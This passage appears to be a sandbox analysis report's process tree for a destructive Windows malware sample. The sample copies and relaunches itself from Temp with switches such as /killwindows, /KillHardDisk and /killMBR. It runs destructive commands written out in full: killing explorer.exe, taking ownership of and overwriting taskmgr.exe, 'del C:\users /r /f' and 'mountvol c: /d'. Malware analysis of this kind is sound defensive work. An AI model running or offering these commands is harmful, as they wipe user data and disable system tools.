    - Executes dropped EXE
    PID:5352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe+025508.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70770.exe
      4⤵
      PID:776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70770.exe 1698530834
      4⤵
      PID:6120
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70770.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70770.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:8144
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:4028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:8664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe+712621.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70777.exe
      4⤵
      PID:6284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70777.exe 1698530834
      4⤵
      PID:8588
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70777.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70777.exe 1698530834
        5⤵
        
        PID:8784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:7300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:5904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4028
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
    3⤵
    PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe 1698530834
      4⤵
      Suspicious use of WriteProcessMemory
      PID:964
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe 1698530834
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:4448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+715805.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        8⤵
        
        PID:1224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe 1698530834
        8⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:2812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /save 1698530834
        10⤵
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /save 1698530834
        11⤵
        Executes dropped EXE
        
        PID:5280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /protect 1698530834
        10⤵
        
        PID:1420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:5656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /autoup 1698530834
        10⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /autoup 1698530834
        11⤵
        
        PID:7216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /killwindows 1698530834
        10⤵
        
        PID:6916
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /killwindows 1698530834
        11⤵
        
        PID:6116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:7408
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:10248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:5356
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        13⤵
        
        PID:11796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /KillHardDisk 1698530834
        10⤵
        
        PID:7720
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /KillHardDisk 1698530834
        11⤵
        
        PID:7028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:8340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:10232
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        13⤵
        
        PID:11972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /killMBR 1698530834
        10⤵
        
        PID:9404
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /killMBR 1698530834
        11⤵
        
        PID:6712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /protect 1698530834
        10⤵
        
        PID:11636
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /protect 1698530834
        11⤵
        
        PID:1140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /autoup 1698530834
        10⤵
        
        PID:12632
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /autoup 1698530834
        11⤵
        
        PID:13236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+917902.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        8⤵
        
        PID:436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe 1698530834
        8⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:5388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /protect 1698530834
        10⤵
        
        PID:6128
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /protect 1698530834
        11⤵
        Executes dropped EXE
        
        PID:1820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe+613191.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        12⤵
        
        PID:6384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe 1698530834
        12⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe 1698530834
        13⤵
        Executes dropped EXE
        
        PID:7256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:6808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:8656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /autoup 1698530834
        14⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /autoup 1698530834
        15⤵
        
        PID:3480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /killwindows 1698530834
        14⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /killwindows 1698530834
        15⤵
        
        PID:7632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        16⤵
        
        PID:4092
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        17⤵
        Modifies file permissions
        
        PID:10264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        16⤵
        
        PID:6896
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        17⤵
        
        PID:11692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /KillHardDisk 1698530834
        14⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /KillHardDisk 1698530834
        15⤵
        
        PID:3164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        16⤵
        
        PID:8232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        16⤵
        
        PID:10112
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        17⤵
        
        PID:11884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /killMBR 1698530834
        14⤵
        
        PID:9396
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /killMBR 1698530834
        15⤵
        
        PID:9360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /protect 1698530834
        14⤵
        
        PID:11312
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /protect 1698530834
        15⤵
        
        PID:1772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707969.exe
        16⤵
        
        PID:12468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /autoup 1698530834
        14⤵
        
        PID:12640
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe /autoup 1698530834
        15⤵
        
        PID:13204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70796.exe C:\windows\system32\taskmgr.exe
        14⤵
        
        PID:6080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe+811267.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe
        12⤵
        
        PID:2948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe 1698530834
        12⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe 1698530834
        13⤵
        
        PID:8792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:4904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:5852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /autoup 1698530834
        14⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /autoup 1698530834
        15⤵
        
        PID:9376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /killwindows 1698530834
        14⤵
        
        PID:11160
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /killwindows 1698530834
        15⤵
        
        PID:5556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        16⤵
        
        PID:13564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /KillHardDisk 1698530834
        14⤵
        
        PID:12660
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /KillHardDisk 1698530834
        15⤵
        
        PID:13140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        16⤵
        
        PID:13848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70798.exe /killMBR 1698530834
        14⤵
        
        PID:3004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /save 1698530834
        10⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /save 1698530834
        11⤵
        Executes dropped EXE
        
        PID:6716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:6672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /autoup 1698530834
        10⤵
        
        PID:7144
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /autoup 1698530834
        11⤵
        
        PID:5516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /killwindows 1698530834
        10⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /killwindows 1698530834
        11⤵
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:5244
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:9364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /KillHardDisk 1698530834
        10⤵
        
        PID:8220
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /KillHardDisk 1698530834
        11⤵
        
        PID:8384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:10188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /killMBR 1698530834
        10⤵
        
        PID:9464
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /killMBR 1698530834
        11⤵
        
        PID:10956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /protect 1698530834
        10⤵
        
        PID:11764
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /protect 1698530834
        11⤵
        
        PID:6532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70799.exe
        12⤵
        
        PID:11632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /autoup 1698530834
        10⤵
        
        PID:12624
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe /autoup 1698530834
        11⤵
        
        PID:13212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:3772
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:4040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:5160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+33488.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        8⤵
        
        PID:6136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe 1698530834
        8⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4120
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /autoup 1698530834
        10⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /autoup 1698530834
        11⤵
        
        PID:9052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /killwindows 1698530834
        10⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /killwindows 1698530834
        11⤵
        
        PID:3972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:6168
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:9116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:10136
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        13⤵
        
        PID:11728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /KillHardDisk 1698530834
        10⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /KillHardDisk 1698530834
        11⤵
        
        PID:5444
        
        C:\Windows\system32\cmd.exe
        
